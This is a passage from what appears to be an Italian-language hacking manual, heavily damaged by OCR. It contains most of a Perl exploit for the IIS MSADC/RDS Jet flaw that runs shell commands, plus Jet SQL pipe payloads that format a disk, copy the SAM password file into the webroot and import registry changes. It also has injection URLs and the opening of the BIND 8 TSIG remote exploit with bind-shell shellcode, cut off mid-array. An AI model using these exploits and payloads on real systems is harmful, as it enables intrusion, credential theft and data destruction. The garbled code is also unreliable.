my ($switch, $pl, $p2)=@_; 

my $req=""; my $tl, $t2, $query, $dsn; 

if ($switch==l) { § this is the btcustmr.mdb query 

$query="Select * from Customers where City= ' / shell (\ "$command\ ") / ' " ; 
$dsn="driver={Microsoft Access Driver (*.mdb) };dbq=" . 

$pl . ":\\" . $p2 . "\\help\\iis\\htm\\tutorial\\btcustmr.mdb;";} 

elsif ($switch==2) { # this is general make table query 
$query=" create table AZZ (B int, C varchar (10) ) " ; 
$dsn="$pl "; } 

elsif ($switch==3) { # this is general exploit table query 
$query="select * from AZZ where C=' / shell (\"$command\") / ' "; 
$dsn="$pl "; } 

elsif ($switch==4) { # attempt to hork file info from index server 
$query="select path from scope () "; 
$dsn="Provider=MSIDXS; ";} 

elsif ($switch==5) { # Jbad query 
$query= " select "; 
$dsn="$pl "; } 

elsif ($switch==6) { # this is table-independant query (new) 

$query=" select * from MSysModules where name= ' / shell (\ "$command\ ") / ' " ; 

$dsn="$pl "; } 

$tl= make unicode ($query) ; 
$t2= make_unicode ($dsn) ; 

if (defined $args{V)) { $req=""; } else {$req = "\x02\xOO\x03\xOO" ; } 
$req.= "\x08\x00" . pack ("SI", length ($tl) ) ; 
$req.= "\xOO\xOO" . $tl ; 

$req.= "\x08\x00" . pack ("SI", length ($t2) ) ; 
$req.= "\xOO\xOO" . $t2 ; 

$req. = "\r\n — ! ADM! ROX! YOUR ! WORLD ! — \r\n "; 
return $req; } 

############################################################################## 

sub make unicode { # quick little function to convert to unicode 
my ($in)=@_; my $out; 

for ($c=0; $c < length ($ in) ; $c++) { $out . =substr ($in, $c, 1) . "\x00"; } 
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############################################################################## 

sub rdo_success { # checks for RDO return success (this is kludge) 

my (@in) = @_; my $base=content_start (@in) ; 

if ($in [$base] =~/multipart\/mixed/) { 

return 1 if( $in [$base+10] =~/*\x09\x00/ );} 

return 0; } 

############################################################################# 

sub make_dsn { # this (tries to) make a DSN for us 
print "\nMaking DSN: "; 
foreach $drive (Qdrives) { 
print "$drive: "; 

my @results=sendraw ( "GET /scripts/tools/newdsn . exe?driver=Microsoft\%2B" . 
"Access \ %2BDriver\ %2B \%28*. mdb \%29\ &dsn=wicca \ &dbq= " 
. $drive . "\%3A\%5Csys .mdb\&newdb=CREATE__DB\&attr= HTTP/1 . 0\n\n" ) ; 
$results[0]=~m#HTTP\/([0-9\.]+) ([0-9]+) (["\n]*)#; 
return 0 if $2 eq "404"; § not found/doesn ' t exist 
if($2 eq "200") { 

foreach $line (@results) { 

return 1 if $line=~/<H2>Datasource creation success ful<\/H2>/ ; } } 
} return 0; } 

############################################################################## 

sub verify_exists { 
my ($page)=0_; 

my @results=sendraw("GET $page HTTP/1 . 0\n\n" ) ; 
return $results [0] ; } 

############################################################################## 
sub try_btcustmr { 

foreach $dir (Qsysdirs) { 

print "$dir -> "/ # fun status so you can see progress 

foreach $drive (Qdrives) { 

print "$drive: "; # ditto 
$reqlen=length ( make^req (1 , $drive, $dir) ) — 28; 
$reqlenlen=length ( "$reqlen " ) ; 
$clen= 206 + $reqlenlen + $reqlen; 

my @results=sendraw (make_header () . make_req(l, $drive, $dir) ) ; 
if (rdo__success (Qresults) ) {print "Success !\n" ; 

save ("dbq=" . $drive . " :\\" . $dir. "\\help\\iis\\htm\\tutorial\\btcustmr .mdb; ") ; 
exit; } 

else { verbose (odbc_error (@results) ) ; funky (@results) ; ) } print "\n";)) 

############################################################################## 

sub odbc error { 

my (@in)=@_; my $base; 

my $base = content_start (@in) ; 

if($in[$base]=~/application\/x-varg/){ # it *SHOULD* be this 
$in [$base+4]=~s/["a-zA-Z0-9 \ [\] \ : \/\\ ' \ (\) ]//g; 
$in [$base+5]=~s/ ' ["a-zA-ZO-9 \[\]\:\/\\'\ (\)]//g; 
$in [$base+6]=~s/ ["a-zA-ZO-9 \[\1\ :\/W\ (\)]//g; 
return $in [ $base+4 ] . $in [ $base+5 ] . $in [ $base+6] ; } 

print " \nNON— STANDARD error. Please sent this info to rfp\@wiretrip . net : \n" ; 
print "$in : " . $in [ $base ] . $in [ $base+l ] . $in [ $base+2 ] . $in [ $base+3 ] . 
$in[$base+4] . $in[$base+5] . $in [$base+6] ; exit;} 

############################################################################# 

sub verbose { 

my ($in)=@_; 

return if !$verbose; 

print STDOUT "\n$in\n"; } 

############################################################################## 
sub save { 

my ($pl)=@-! my $ropt=""; 
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if (defined $args{c}){ $ropt="c ";) 
if (defined $args{V}){ $ropt.="V ";} 
if (defined $args{w}){ $ropt.="w ";} 
print OUT "v2\n$ip\n$ropt\n$pl\n" ; 
dose OUT; } 

############################################################################# 

sub load { 

my ($action) =@_; 

my @p; my $drvst="driver= {Microsoft Access Driver (*.mdb) }; " ; 
open (IN, "<rds . save") Il die ( "Couldn ' t open rds . save\n ") ; 
@p=<IN>; dose (IN) ; 

die ("Wrong rds . save version" ) if $p[0] ne "v2\n"; 
$ip="$p[l]"; $ip=~s/\n//g; 

$target= inet_aton ($ip) Il die ( "inet_aton problems") ; 
print "Resuming to $ip . . . " ; 
@switches=split (/ /, $p[2]) ; 
foreach $switch (@switches) { 
$args{$switch} = "l "; } 

if (defined $args{w}) {$comm="command /c" ; } else { $comm="cmd /e";} 
print "Type the command line you want to run ($comm assumed) :\n" 

. "$comm "; 
$in=<STDIN>; chomp $in; 
$command="$comm " . $in ; 

$torun="$p [3] "; $torun=~s/\n//g; 
if ($torun=~ /btcustmr / ') { 

$args{ 'c' } = "1"; } # this is a kludge to make it work 

if ($torun=~/*dbq/) { $torun=$drvst . $torun; } 

if (run_query ( "$torun ") ) { 

print "Success !\n" ; } else { print "failed\n"; } 

exit; } 

sub create_table { 
return 1 if (! defined $args{c}) ; 
return 1 if (defined $args{V}) ; 
my ($in)=@_; 

$reqlen=length ( make_req (2 , $in, " " ) ) - 28; 
$reqlenlen=length ( "$reqlen " ) ; 
$clen= 206 + $reqlenlen + $reqlen; 

my @results=sendraw(make_header() . make_req (2, $in, " ") ) ; 
return 1 if rdo^success (Qresults) ; 
my $temp= odbc__error (@results) ; verbose ($temp) ; 
return 1 if $temp=~/Table 'AZZ ' already exists/; 
return 0; } 

############################################################################## 

sub knowndsn { 
foreach $dSn (@dsns) { 
print ". "; 

next if ( ! is_access ("DSN=$dSn") ) ; 
if (create_table ( "DSN=$dSn ") ) { 
if (run_query ( "DSN=$dSn ") ) { 

print "$dSn: Success !\n" ; save ("dsn=$dSn") ; exit; }}} print "\n" ; } 

############################################################################## 

sub is_access { 
my ($in)=@_; 

return 1 if (! defined $args{c}); 
return 1 if (defined $args(V}); 
$reqlen=length ( make_req (5, $in, " ") ) — 28; 
$reqlenlen=length ( "$reqlen " ) ; 
$clen= 206 + $reqlenlen + $reqlen; 

my @results=sendraw(make header() . make_req(5, $in, "") ) ; 
my $temp= odbc error (@results) ; 

verbose ($temp) ; return 1 if ($temp=~/Microsoft Access/) ; 
return 0; } 
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sub run_query { 

my ($in)=@_; my $req; 

if (defined $args(c}) {$req=3; } else ($req=6; } 
$reqlen=length ( make_req ($req, $in, " " ) ) - 28; 



$reqlenlen=length ( "$reqlen " ) ; 
$clen= 206 + $reqlenlen + $reqlen; 

my @results=sendraw (make_header () . make_req ($req, $in, " " ) ) ; 

return 1 if rdo_success (Qresults) ; 

my $temp= odbc^error (@results) ; verbose ($temp) ; 

return 0; } 



############################################################################## 



sub known_mdb { 

my @drives=("c", "d", "e", "f", "g") ; 

my @dirs=( n winnt", "winnt35" , "winnt351" , "win", "Windows") ; 
my $dir, $drive, $mdb; 

my $drv="driver= {Microsoft Access Driver (*.mdb) } ; dbq="; 

foreach $drive (Qdrives) { 
foreach $dir (Qsysdirs) { 
foreach $mdb (Qsysmdbs) { 
print " . "; 

if (create_table ($drv. $drive . " : \ \ " . $dir. $mdb) ) { 
if (run_query ($drv . $drive . ":\\" . $dir . $mdb) ) { 
print "$mdb: Success!\n"; save ("dbq=" . $drive . " :\\" . $dir. $mdb) ; exit; 
}}}}} 

foreach $drive (Qdrives) { 
foreach $mdb (@mdbs) { 
print " . "; 

if (create_table ($drv. $drive . " : " , $mdb) ) { 
if (run^query ($drv. $drive . " : " . $mdb) ) { 
print "$mdb: Success!\n"; save ( "dbq=" . $drive . " : " . $mdb) ; exit; 
}}}} 



############################################################################## 



sub hork idx { 

print "\nAttempting to dump Index Server tables . . . \n "; 

print " NOTE: Sometimes this takes a while, other times it stalls\n\n"; 
$reqlen=length ( make_req (4 ) ) - 28; 
$reqlenlen=length ( "$reqlen " ) ; 
$clen= 206 + $reqlenlen + $reqlen; 

my @results=sendraw(make_header() . make^req (4 ,"","")) ; 

if (rdo_success (@results) ) { 

my $max=@results; my $c; my %d; 

for($c=19; $c<$max; $c++) { 

$results [$c] =~s/\xOO//g; 

$results [$c] =~s/ ["a-zA-ZO-9 : ~ \\\._] {1, 40}/\n/g; 
$results [$c] =~s/ ["a-zA-ZO-9 : ~ \ \ \ ._\n]//g; 
$results [$c] =-/ ( [a-zA-Z] \ : \\) ( [a-zA-ZO-9 _~\\]+)\\/; 
$d{"$l$2 '•) = "";) 
foreach $c (keys %d) { print "$c\n "; ) 

} else {print "Index server not installed/query failed\n"; }} 

############################################################################## 
sub dsn dict { 

open(IN, "<$args{e}") Il die("Can't open external dictionary\n") ; 
while (<IN>) { 

$hold=$_; $hold=~s/[\r\n]//g; $dSn="$hold" ; print "."; 
next if ( ! is_access ( "DSN=$dSn" ) ) ; 
if (create^table ( "DSN=$dSn ") ) { 
if (run_query ( "DSN=$dSn ") ) { 

print "Success !\n" ; save ( "dsn=$dSn" ) ; exit; }}} 
print "\n "; dose ( IN) ; ) 

############################################################################## 



sub content start { # this will take in the server headers 
my (@in)=@_; my $c; 

for ($c=l; $c<500; $c++) { § assume there's less than 500 headers 
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if ($in[$c+l]=~/*HTTP\/l. [01] [12] 00/) { $c++; } 
else ( return $c+l; }}} 
return -1; } # it should never get here actually 

############################################################################## 
sub funky [ 

my (@in)=@_; my $error=odbc_error (@in) ; 

if ($error=~/ADO could not find the specified provider/) { 

print "\nServer returned an ADO miscofiguration message\nAborting . \n" ; 

exit; } 

if ($error=~/A Handler is required/) ( 

print "\nServer has custom handler filters (they most likely are patched)\n" ; 
exit; } 

if ($error=~/ specified Handler has denied Access/) { 

print "\nADO handlers denied access (they most likely are patched)\n"; 
exit; } 

if ($error=~ / 'server has denied access/) { 

print "\nADO handlers denied access (they most likely are patched)\n"; 
exit;}} 

############################################################################## 
sub has_msadc ( 

my @results=sendraw("GET /msadc/msadcs . dll HTTP/1. 0\n\n" ) ; 
my $base=content_start (Qresults) ; 

return if ($results [$base] =~ / Content-Type : application\/x-varg/ ) ; 
my @s=grep ( "^Server : " , @results) ; 

if($s[0] !~/IIS/) { print "Doh! They're not running US .\n$s [0] \n" } 
else ( print "/msadc/msadcs . dll was not found.\n"; } 
exit; } 

############################################################################## 

sub use_unc ( 
$uncpath=$args ( u} ; 

$driverline="driver=(Microsoft Access Driver (*.mdb) };dbq="; 
if(!$uncpath=~/"\ \ \ \ [a-zA-Z0-9_ . ] + \ \ [-a-zA-Z0-9_] + \ \ . +/) { 

print "Your UNC path sucks . You need the following format :\n" . 

"\\server(ippreferable)\share\some-file.mdb\n\n"; exit; } 

if (create table ( $driverline . $uncpath) ) { 
if (runquery ($driverline . $uncpath) ) ( 

print "Success !\n"; save ( "dbq=" . $uncpath) ; exit;}} 

} 

############################################################################## 

sub get^name ( § this was added last minute 
my $msadc=«EOT 

POST /msadc/msadcs . dll/VbBusObj . VbBusObjCls . GetMachineName HTTP/1 . 1 
User-Agent: ACTIVEDATA 
Host : $ip 

Content-Length: 126 
Connection: Keep-Alive 

ADCClientVersion -.01.06 

Content-Type: multipart/mixed; boundary= ! ADM ! ROX ! YOUR ! WORLD ! ; num-args=0 

— ! ADM! ROX! YOUR ! WORLD ! — 
EOT 

; $msadc=~s/\n/\r\n/g; 

my @results=sendraw ($msadc) ; 

my $base=content_start (Qresults) ; 

$results [$base+6] =~s/ [*-A-Za-zO-9 ! \@\#\$\%*\&* () \ [\]_=+~<> . , ?]//g; 
print "Machine name: $results [$base+6]\n" ; } 

############################################################################## 

# special greets to trambottic, hex edit, vacuum (technotronic) , ali §!adm, 

# HwOOwOO & §rhino9 (that ' s a lot of people, and they are ali very elite and 

# good friends!), wiretrip, lOpht, nmrc & ali of phrack 
# 

# thumbs up to packetstorm, hackernews, phrack, security focus, ntsecadvice 
# 

# I wish I could really name everyone, but I can't. Don't feel slighted if 

# your not on the list. . . :) 
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Sempre in rete è possibile reperire un infinità di Utilities le quali sono indirizzate all'esecuzione 
di questo tipo di exploit mediante un interfaccia grafica. 




Una di queste rimane residente nella toolbar dei programmi attivi, quella in basso a destra, e 
quindi è possibile richiamarla ogni qualvolta se ne richieda l'uso. 
Il programma si chiama RDSExploit. 

Per capire come di fatto questo funziona è possibile utilizzare una tecnica di sniffing 
indirizzata a vedere i dati trasmessi dal programma e un sito qualsiasi non soggetto al BUG. 
Questa metodologia si basa sulla ricostruzione della sessione TCP fatta da COMMVIEW. 
In pratica inseriamo un URL dentro al programma e richiediamo a COMVIEW di farci vedere 
la connessione eseguita con questo sito. 
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A questo punto selezioniamo la riga con la connessione e mediante l'opzione che viene 
mostrata premendo il tasto destro del mouse, jump to first racket of andiamo sul primo 
pacchetto di questa. 

Scegliamo la voce di menu TOOLS e poi quella relativa alla ricostruzione di tutta le sessione 
TCP. 
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Nella finestra ci verrà mostrata tutta le sequenza di dati scambiata tra noi e il sto di 
destinazione. 

I dati scritti in rosso sono quelli inviati mentre quelli blu sono quelli ricevuti. 
COMMVIEW ci dà la possibilità di vedere in diversi formati le informazioni e precisamente in 
ASCII, ESADECIMALE ecc. 

II testo usato dal programma e quello ricevuto è : 

POST /msadc/msadcs .dll/AdvancedDataFactory .Execute HTTP/1.1 

User-Agent: ACTIVEDATA 

Host: www.inalessandria.it 

Content -Length : 64 9 

Connection : Keep-Alive 

Cache-Control : no-cache 

ADCClientVersion : 01 . 06 

Content-Type : multipart/mixed; boundary=/o) ve . ct6oziz-lo?/s0; num- 
args=l 0 

— /o) ve . ct6oziz-lo?/s0 
Content-Type : application /x-varg 
Content-Length : 439 

J. . .C.o.m.m.a.n.d. .T.i.m.e. 

.O.u.t.=.~.3.0.;.B.a.t.c.h. ,S.i.z.e.=.~.1.5.;.U.p.d.a.t.e. 
.C.r.i.t.e.r.i.a.=.~.2.; .B.a.c.k.g.r.o.u.n.d. .F .e . t .eh. 
.S.i.z.e.=.~.1.5.; .I.n.i.t.i.a.l. .F.e.t.c.h. 
.S.i.z.e.=.~.5.0. ; .B.a.c.k.g.r.o.u.n.d. .t.h.r.e.a.d. 
.P.r.i.o.r.i.t.y.=.~.3.; .A.u.t.o. .R.e.c.a.l.c.=.~.l.; .U.p.d. a.t.e. 

.R.e.s.y.n.c.=.~.l 0 . . .S.E.L.E.C.T. .*. .F.R.O.M. 

.P.r.o.d.u.c.t.s. 

M.o.d.e.=.3. 

— /o) ve . ct6oziz-lo?/s0 — 
HTTP/1.1 100 Continue 
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Server: Microsoft-IIS/4.0 

Date: Sun, 10 Mar 2002 10:47:43 GMT 

HTTP/1.1 405 Method not allowed 
Server : Mi eroso ft -US/ 4 . 0 
Date: Sun, 10 Mar 2002 10:47:43 GMT 

Connection: dose 

Allow: OPTIONS, TRACE, GET, HEAD, PUT, DELETE, POST 
Content-Length : 545 
Con tent- Type : t ex t /html 

<htmlxhead><title>Error 405</title> 

<meta name=" robot s" content="noindex"> 

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859- 
1 "></head> 

<body> 

<h2>HTTP Error 405</h2> 

<pxstrong>405 Method Not Allowed</strongx/p> 

<p>The method specified In the Request Line is not allowed for the 
resource identified by the request . Please ensure that you have the 
proper MIME type set up for the resource you are request ing . </p> 

<p>Please contact the server 's administrator if this problem 
persists . </p> 

</bodyx/html> 

La visualizzazione in questo modo semplifica l'individuazione precisa del metodo usato per 
inoltrare la query. 

Links 

- Office 97/Jet 3.5 update binary (i386) 
http://www.wiretrip.net/rfp/bins/msadc/jetcopkq.exe 
http://officeupdate.microsoft.com/isapi/qooffupd.asp 

?TARGET=/downloaditems/JetCopkg.exe 

- Microsoft Universal Data Access homepage 
http://www.microsoft.com/data/ 

- MDAC 2.1 .2.4202.3 (GA) (aka MDAC 2.1 sp2) update (Ì386) 
http://www.wiretrip.net/rfp/bins/msadc/mdac typ.exe 
http://www.microsoft.com/data/download 21 242023.htm 

- MDAC 2.1 .1 .371 1 .1 1 (GA) (aka MDAC 2.1 spi ) hotfix 
http://www.microsoft.com/data/download/ietODBC.exe 

- MDAC 2.1 release manifest 
http://www.microsoft.com/data/MDAC21 info/MDAC21 sp2manifest.htm 

- MDAC 2.1 installation FAQ 
http://www.microsoft.com/data/MDAC21info/MDACinstQ.htm 

- Security Implications of RDS 1 .5, MS 3.0 or 4.0, and ODBC 
http://support.microsoft.eom/support/kb/articles/q184/3/75.asp 

- Unauthorized ODBC Data Access with MS and RDS (MS99-004) 
http://www.microsoft.com/security/bulletins/ms98-004.asp 

- Re-release of MS99-004 (MS99-025) 
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http://www.microsoft.com/security/bulletins/ms99-025.asp 

- MS99-025 FAQ (best explanation of problem by Microsoft) 
http://www.microsoft.com/security/bulletins/MS99-025faq.asp 

- MS99-30: Patch available for Office ODBC Vulnerabilities 
http://www.microsoft.com/security/bulletins/ms99-030.asp 

- Jet Expression Can Execute Unsafe VBA Functions 
http://support.microsoft.eom/support/kb/articles/q239/1 /Q4.asp 

- Implementing Custom Handlers in RDS 2.0 
http://www.microsoft.com/Data/ado/rds/custhand.htm 

- Handsafe registry patch (enables handlers) 
http://www.wiretrip.net/rfp/bins/msadc/handsafe.exe 
http://www.microsoft.com/security/bulletins/handsafe.exe 

- RFP9901 : NT ODBC remote compromise 
http://www.wiretrip.net/rfp/p/doc.asp?id=3&iface=2 

- RFP9902: RDS/IIS 4.0 vulnerability and exploit 
http://www.wiretrip.net/rfp/p/doc.asp?id=1&iface=2 

- RDS exploit (msadc.pl v1 and v2) 
http://www.wiretrip.net/rfp/p/doc.asp?id=16&iface=2 

- ULG recommended fix on OSALL 
http://www.aviary-mag.com/News/Powerful Exploit/ULG Fix/ulg fix.html 

- CERT blurb 
http://www.cert.org/current/current activity.html#Q 

- Attrition mirror of defaced websites (patch or you'll be on it!) 
http://www.attrition.org/mirror/attrition/ 

Il programma sfruttando l'UNICODE BUG cerca di eseguire il comando specificato nel 
secondo campo di edit. 

ODBC permette ad un programma di accedere ad un database relazionale utilizzando SQL. 
Se un client sbaglia a quotare correttamente i meta caratteri all'interno di blocco di dati usati 
da una query SQL, un attaccante potrebbe essere in grado di interferire con le tabelle di un 
database. 

Tuttavia il Microsoft "Jet" database engine (MS Access) fornisce alcune estensioni di SQL le 

quali permettono l'esecuzione di codice VBA (Visual Basic for Applications). 

Questo fornisce un buco nell'ambito del sistema di quoting dei Meta caratteri che può risultare 

pericoloso. 

In SQL le stringhe devono essere quotate mediante le virgolette singole ovvero i caratteri ' . 
Se una delle stringhe dovesse contenere questo carattere già per se stesso, questo dovrebbe 
essere fornito raddoppiato. 

Il Jet engine estende questo permettendo che nelle stringhe possano essere inseriti 
statement VBA i quali devono essere inseriti tra I caratteri che vengono visti come barre 
verticali ovvero i caratteri detti di pipe. 
Un esempio è : 

select '111' ' string / 6+7 \ with number' as foo from table; 

Questo stringa di comando crea un recordset contenente un campo con il valore 



per ogni riga della tabella d'input. 

Abbastanza innocuo se i CGI o un programma ASP correggono il quoting dei dati in ingresso. 
Purtroppo l'uso di questo carattere di pipe è abbastanza sconosciuto per cui possono 
verificarsi dei problemi legati a questo. 

Questo carattere detto anche barra verticale è un carattere riservato per il Jet database 
engine. 

Esso dice al Jet database engine di valutare gli identificatori prima di valutare il resto 
dell'espressione. 

Di conseguenza il Jet database engine inserisce il valore dell'identificatore nell'espressione e 
quindi la valuta. 
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La barra verticale è spesso utilizzata nelle funzioni di aggregazioni dei domini quando si 
vuole che la funzione stessa rivaluti il valore ritornato nel filtro. 
In altro modo la barra verticale viene utilizzata come alternativa all'operatore (&) quando si 
vuole concatenare un valore di testo. 

A causa di questo, dato che non potete includere la barra verticale in una stringa letterale, 
dovrete utilizzare la funzione Chr() per poterlo fare. 
Usando Chr(124) è come se usaste la barra verticale. 

Qualsiasi dei dati inclusi in una Jet SQL query possono contenere degli statement quotati 
VBA, infatti qualsiasi funzione listata nel "Functions Reference" di VBA viene valutata e quindi 
funziona, benché questo sembri essere differente da versione a versione del Jet engine 
stesso. 

Per esempio in alcuni casi la funzione "eval" funziona mentre in altri casi no. 

Il comando più utilizzato è il comando "shell", sebbene questo di per se stesso non possa 

eseguire redirezioni o pipes. 

Utilizzando la funzione shell ed eseguendo il file cmd.exe, un attaccante può eseguire 
qualsiasi comando sul sistema. 

environ() può anche essere usato per usare I valori delle variabili di environment all'interno 
dei vostri comandi, e chr() può essere veramente funzionale per quotare dei caratteri 
alfanumerici e parentesi. 

Ci sono anche funzioni standard del tipo di iif() e altri operatori legati alle operazioni sulle 

stringhe (usate "&" per la concatenazione). 

Un esempio pratico di uso dei caratteri di pipe è : 

|shell("cmd le echo " & chr(124) & " format a:")| 
(133) 

Il comando precedente formatta il floppy. 
Qualsiasi errore viene ignorato. 

L'uso di "cmd /c" permette al comando di ricevere un newline all'interno del comando di 

format, altrimenti il pipe e il format verrebbero passati come argomento all' 'echo'. 

Questa stringa può essere inclusa in qualsiasi cosa da una semplice operazione ODBC a un 

oggetto di testo dentro un form ASP di una pagina WEB. 

Un esempio più sofisticato riguarda il fatto di afferrare una copia del SAM: 

|shell("cmd/crdisk/S-")| 

|shell("cmd le copy c:\winnt\repair\sam._ c:\inetput\wwwroot")| 

I comandi possono essere accatasati: 

|shell("cmd le echo 1 > %temp%\foo.txt") & shell("cmd le echo 2 \ » %temp%\foo.txt") & 
shell("cmd le echo 3 » %temp%\foo.txt")| 

Mediante questi comandi sarebbe al limite possibile anche modificare delle voci dentro al 
registro. 

Questo teoricamente non potrebbe essere possibile farlo in modo diretto ma mediante un 
stratagemma si. 

II altre parole potrebbe essere possibile creare da prima un file .REG e successivamente 
inserirlo detro al registro di Windows. 

"cmd le regedit /s %temp%\tmp.reg"; 

Il comando Vs' è importante in quanto sopprime la finestra informativa che segnalerebbe 
l'avvenuta modifica del registro. 

Per fare un esempio possiamo usare un file di esempio il quale nella normalità dovrebbe 
essere richiamato con : 

http://www.example.com/scripts/samples/details.idc?Fname=&Lname 
Ora sostituiamo l'ultima parte con : 
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Questa usa un nome DSN chiamato "Web SQL". 

La tabella attuale deve essere inizializzata dentro al DSN mediante il seguente codice : 
http://www.example.com/scripts/samples/ctguestb.idc 

Ritornando alla teoria degli ODBC possiamo dire che una determinata applicazione può 

connettersi al servizio ODBC specificando il nome del DSN il quale generalmente viene 

creato tramite l'apposito applet presente nel pannello di controllo chiamato ODBC32. 

Ogni singolo DSN è composto da un nome, da una descrizione, dal driver da utilizzare (ad 

esempio ACCESS o SQLSERVER) e dalla locazione del file di dati. 

I DSN possono utilizzare qualsiasi driver legato all'accesso ai più disparati sistemi di 

database. 

Se il DSN non fosse stato creato mediante le opzioni dentro al pannello di controllo, tramite 

due Utilities, precisamente getdrvrs.exe e dsnform.exe, sarebbe possibile crearlo tramite CGI 

funzionanti sotto MS. 

La sequenza di operazioni sono : 

(134) 

• http://server/scri pts/tool s/getdrvrs. exe 

• scelta Microsoft Access Driver (*.mdb) 

• Inserì me n t o di un no me corretto DSN 

• Inserimento percorso database Ad esempio: c:\web.mdb 

• Co n f e r ma 

E' possibile anche passare i parametri a : 

http: //server/seri pts/tool s / newdsn. e x e ? d r i ver = Mi crosoft%2B 
Access %2 B D r i ver %2 B %2 8 * . md b %2 9 & d s n = D 5 N n a me &d bq =c : \ we b . md b & 
newdb=CREATE_DB&attr= 

Volendo ora riportare alcuni esempi potremmo partire vedendo uno script classico : 
http://server/scri pts/sampl es/detai I s. i dc?Fname =&L na me = 
All'interno di Fnamo o Lname potrebbe essere composto il comando : 
d et a i I s . i d c ? F n a me =h i &L n a me =| s h e I I ( " c md +/ c +d i r " ) | 



I problemi legati al DN S 

II protocollo 53 legato al server DNS è sempre stato uno dei maggiori problemi nell'ambito 
della sicurezza. 

Supponiamo di avere un server su cui gira un server DNS e ce ad un certo punto, dopo aver 
verificato certi problemi, andando a vedere i files di log ci ritroviamo davanti a : 

Apr 23 01:27:01 ns.vlctlm.com named[98] : /usr/sbin/named: Segmentatlon fault 

- core dumped 

Apr 23 01:30:00 ns.vlctlm.com watchdog [100] : named not found In process 
table, restartlng ... 

Apr 23 01:30:10 ns.victlm.com watchdog [100] : named [14231] restarted 

Apr 23 01:31:19 ns.victim.com named [ 98 ] : /usr/sbin/named: Segmentation fault 

- core dumped 

Cosa potrebbe essere capitato ? 

Quasi sicuramente un attacco al DNS tramite uno dei vari bugs che bind nel tempo ha 
posseduto. 

Uno dei più famosi bugs è quello definito con il termine di BIND TSIG. 

BIND versione 8 contiene un buffer overflow al'interno di quello che viene chiamato con 

Transaction Signatures (TSIG). 

L'exploit per questo bugs è quello che segue. 

NOTA: Questo problema è ancora presente su moltissimi sistemi. 
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/* 

This exploit has been fixed and extenslve explanatlon and clarlflcatlon 

* added. 

* Cleanup don e by: 

* Ian Goldberg <ian@cypherpunks . ca> 

* Jonathan Wilkins <jwilkins@bitland.net> 

* NOTE: the default installatlon of RedHat 6.2 seems to not be affected 

* due to the compller optlons . If BIND Is bullt from source then the 

* bug is able to manlfest itself. 
*/ 

m 

* Originai Comment : 

* lame named 8.2.x remote exploit by 
* 

* Ix [adresadeforward@yahoo.com] (the master of jmpz) , 

* lucysoft [lucysoft@hotmail.com] (the master of queries) 
* 

* this exploits the named INFOLEAK and TSIG bug (see 
http: //www. isc. org/products/BIND/bind-security . html) 

* linux only shellcode 

* this is only for demo purposes, we are not responsable in any way for 
what you do with this code. 



* flamez - canaris 

* greetz - blizzard, netman . 

* creditz - anathema <anathema@hack . co . za> for the origina 

* - additional code ripped from statdx exploit by ronln 
* 

* woo, almost forgot... this exploit is pretty much broken (+4 errors) , but 
we hope you got the idea . 

* if you understand how it works, it won't be too hard to un-broke it 
*/ 



^include 


<unistd. h> 


^include 


<stdio . h> 


^include 


<stdlib . h> 


^include 


<signal . h> 


^include 


<time . h> 


^include 


<string . h> 


^include 


<ctype . h> 


^include 


<netdb.h> 



^include <netinet/in . h> 
§ include <netinet/in_systm.h> 
iinclude <sys/time . h> 
^include <sys/types.h> 
iinclude <sys/socket . h> 
iinclude <arpa/inet . h> 
iinclude <arpa/nameser.h> 
idefine max(a,b) ((a)>(t 
idefine BUFFSIZE 4096 
int argevdispl, arge 
char shellcode [] = 



* and the number of bytes used so far. This needs to 


be 


lower than 


* 62 in order to fit in a single Query Record. 2 are 


ust 


ìd in total to 


* send the shell code 






*/ 






/* main: */ 














spot first */ 
"\xeb\x44" /* jn 
/* start: */ 
"\x5e" /* popi %esi 

/* socket () */ 
"\x29\xc0" /* subì %eax, %eax */ // 2 - 5 
"\x89\x46\xl0" /* movi %eax, 0x10 (%esi) */ // 3 
"\x40" /* incl %eax */ // 1 - 9 
"\x89\xc3" /* movi %eax, %ebx */ // 2 - 11 
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"\x89\x46\x0c" 


/* 


movi 


%eax, 


OxOc (%es±) 






"\x40" /* incl 


%eax */ 


// 1 - 


15 






"\x89\x46\x08" 


/* 


movi 


%eax, 


0x08 (%esl) 


*/ 


// 3 - 18 


"\x8d\x4e\x08" 


/* 


leal 


0x08 (% 


esl) , %ecx 


*/ 


// 3 - 21 


"\xb0\x66" /* 


movb $0x66, %al 


*/ // 2 - 






"\xcd\x80" /* 


int 


$0x8C 


*/ // 


2-25 







/* blnd() */ 
"\x43" /* incl %ebx */ // 1 - 26 

"\xc6\x46\xl0\xl0" /* movb $0x10, 0x10 (%esi) */ // 4 - 30 
"\x66\x89\x5e\xl4" /* movw %bx, 0x14 (%esi) */ // 4 - 34 
"\x88\x46\x08" /* movb %al, 0x08 (%esi) */ // 3 - 37 
"\x29\xc0" /* subì %eax, %eax */ // 2 - 39 
"\x89\xc2" /* movi %eax, %edx */ // 2 - 41 
"\x89\x46\xl8" /* movi %eax, 0x18 (%esi) */ // 3 - 44 
■ 

* the port address in hex (0x9000 = 36864), if this is ci. 
similar 

* change must be made in the connection () cali 

* NOTE: you only get to set the high byte 
*/ 

"\xb0\x90" /* movb $0x90, %al */ // 2 - 46 



\x8d\x4e\xl4" /* leal 0x14 (%esi), %ecx */ // 3 - 53 

\x89\x4e\x0c" /* movi %ecx, OxOc (%esi) */ // 3 - 56 

\x8d\x4e\x08" /* leal 0x08 (%esi), %ec 

\xeb\x02" /* jmp cont */ // 2 - 2 
/* intr: */ 

\xeb\x43" /* jmp callz */ // 2 - 4 
/* cont: */ 

\xb0\x66" /* movb $0x66, %al */ // 

\xcd\x80" /* int $0x80 */ // 2 - 10 
/* listen() */ 

\x89\x5e\x0c" /* movi %ebx, OxOc(%esi) */ // 3 - 11 

\x43" /* incl %ebx *///!- 12 

\x43" /* incl %ebx *///!- 13 

\xb0\x66" /* movb $0x66, %al */ // 2 - 15 

/* accept () */ 
\x89\x56\x0c" /* movi %edx, OxOc(%esi) */ // 3 - 20 
\x89\x56\xl0" /* movi %edx, 0x10 (%esi) */ // 3 - 23 
\xb0\x66" /* movb $0x66, %al */ // 2 - 25 
\x43" /* incl %ebx */ // 1 - 26 
\xcd\x80" /* int $0x80 *///!- 27 

/* dup2(s, 0); dup2(s, 1) ; dup2(s, 2); */ 
\x86\xc3" /* xchgb %al, %bl */ // 2 - 29 
\xb0\x3f" /* movb $0x3 f, %al */ // 2 - 31 
\x29\xc9" /* subì %ecx, %ecx */ // 2 - 33 
